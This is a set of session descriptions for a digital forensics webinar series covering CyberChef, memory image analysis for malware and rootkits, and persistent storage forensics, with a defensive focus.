This second part focuses on the analysis part of the forensic process, using open-source tools to dissect obfucated or encoded bits of information, search disk and memory images for indicators of compromise (IOCs), and create super-timelines.
Since its first release in 2017 CyberChef - described as "The Cyber Swiss Army Knife" - has quickly become one of the go-to tools for many IT security practitioners. CyberChef is a free, browser-based, open source tool, that supports hundreds of different "cyber operations" such as encoding, encrypting, compressing, converting, analysing data, etc. It is especially useful for malware analysts as well as forensic investigators. This webinar/live demo will demonstrate many of CyberChef's powerful capabilities as well as some of the less well known operations.
Having obtained an image of the memory of a compromised system, what to do with it? This part of the forensic process is called analysis, and this webinar will go through the first steps of analysing a memory image, looking into processes, network and temporary filesystems as well as some operating system specific artefacts, such as the Windows registry of the Linux Bash history.
Malware that is other compressed and encrypted on disk is usually unpacked and in cleartext in memory. Likewise, rootkits that conceal adversary activities can be found with relative ease in the memory image of a compromised system. This webinar will show some techniques to obtain malware that works along common ways, such as DLL injection, malicious kernel modules, or system call table manipulation. Concluding the module, ways to extract suspicious code segments for further analysis are also shown.
In this session, we will discuss the basic concepts of persistent storage forensics. Furthermore, some approaches with easy-to-use basictools will be presented and demonstrated.
In this session, more advanced analysis methods and tools will be discussed. Furthermore, these methods and tools will be demonstrated inpractice with select case samples.